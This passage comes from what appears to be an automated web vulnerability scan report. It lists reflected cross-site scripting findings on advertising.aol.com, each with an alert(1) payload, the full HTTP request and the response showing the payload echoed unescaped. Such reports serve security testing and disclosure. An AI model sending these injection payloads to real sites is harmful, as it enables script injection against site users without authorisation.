This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cfb4c"-alert(1)-"0b0fe7bc023/2/2/687446498/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=552b73c3518c71814dd028b5029cc3a7; expires=Tue, 06 Dec 2011 22:26:16 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cfb4c"-alert(1)-"0b0fe7bc023/2/2/687446498/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.33. http://advertising.aol.com/token/2/3/326991826/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/326991826/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b924a"><script>alert(1)</script>f81cfdc8fc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b924a"><script>alert(1)</script>f81cfdc8fc3/2/3/326991826/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=78ea6a8d18457cebd881476f00e7a474; expires=Tue, 06 Dec 2011 22:29:02 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b924a"><script>alert(1)</script>f81cfdc8fc3/2/3/326991826/" />
...[SNIP]...

2.34. http://advertising.aol.com/token/2/3/326991826/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/326991826/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2f5b"-alert(1)-"3d9e26abafa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e2f5b"-alert(1)-"3d9e26abafa/2/3/326991826/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=027a190fbacb2646882d381c5b0a11d8; expires=Tue, 06 Dec 2011 22:29:10 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2f5b"-alert(1)-"3d9e26abafa/2/3/326991826/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.35. http://advertising.aol.com/token/3/1/194198501/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/194198501/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ff7"><script>alert(1)</script>c8dc4139504 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /40ff7"><script>alert(1)</script>c8dc4139504/3/1/194198501/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=cf21c639005180e0aaa83ad706909c99; expires=Tue, 06 Dec 2011 22:26:11 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/40ff7"><script>alert(1)</script>c8dc4139504/3/1/194198501/" />
...[SNIP]...

2.36. http://advertising.aol.com/token/3/1/194198501/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/194198501/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50351"-alert(1)-"4a69898f37e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /50351"-alert(1)-"4a69898f37e/3/1/194198501/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=605b278d4dcb46e87f686672bff5f97c; expires=Tue, 06 Dec 2011 22:26:15 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/50351"-alert(1)-"4a69898f37e/3/1/194198501/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.37. http://advertising.aol.com/token/3/3/635701302/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/635701302/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bc4b"><script>alert(1)</script>3f6e6ebf9f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2bc4b"><script>alert(1)</script>3f6e6ebf9f0/3/3/635701302/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=81c737388edf2bd29766c65a2b5941fe; expires=Tue, 06 Dec 2011 22:28:57 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/2bc4b"><script>alert(1)</script>3f6e6ebf9f0/3/3/635701302/" />
...[SNIP]...

2.38. http://advertising.aol.com/token/3/3/635701302/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/635701302/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48f9e"-alert(1)-"11772f6a6ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /48f9e"-alert(1)-"11772f6a6ba/3/3/635701302/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=d2612033aefbeef4208749baf5acfd96; expires=Tue, 06 Dec 2011 22:29:05 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/48f9e"-alert(1)-"11772f6a6ba/3/3/635701302/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.39. http://advertising.aol.com/token/4/1/1230812852/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1230812852/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e3f0"><script>alert(1)</script>09d30ea9f92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2e3f0"><script>alert(1)</script>09d30ea9f92/4/1/1230812852/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=76bff775a129faa1304b37392b680003; expires=Tue, 06 Dec 2011 22:26:04 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/2e3f0"><script>alert(1)</script>09d30ea9f92/4/1/1230812852/" />
...[SNIP]...

2.40. http://advertising.aol.com/token/4/1/1230812852/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1230812852/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9eae"-alert(1)-"a032ced00f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c9eae"-alert(1)-"a032ced00f1/4/1/1230812852/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=96255ae7dc528c38b7196d18a4c50c4d; expires=Tue, 06 Dec 2011 22:26:10 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c9eae"-alert(1)-"a032ced00f1/4/1/1230812852/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

2.41. http://advertising.aol.com/token/4/3/1034886802/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/1034886802/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fcb"><script>alert(1)</script>6846bbf9db3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d0fcb"><script>alert(1)</script>6846bbf9db3/4/3/1034886802/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=453d6aa6c70629967a0c62c1938147fe; expires=Tue, 06 Dec 2011 22:29:02 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/d0fcb"><script>alert(1)</script>6846bbf9db3/4/3/1034886802/" />
...[SNIP]...

2.42. http://advertising.aol.com/token/4/3/1034886802/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/1034886802/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b44fa"-alert(1)-"afa18418078 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b44fa"-alert(1)-"afa18418078/4/3/1034886802/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=6314eca071067204e48bd2e9e8cc2288; expires=Tue, 06 Dec 2011 22:29:11 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b44fa"-alert(1)-"afa18418078/4/3/1034886802/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

2.43. http://advertising.aol.com/token/5/1/411946761/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/1/411946761/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a66c4"-alert(1)-"3b4789d5bc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a66c4"-alert(1)-"3b4789d5bc5/5/1/411946761/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=dd9ecb4ba246774887c4d92ecdea94ae; expires=Tue, 06 Dec 2011 22:26:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
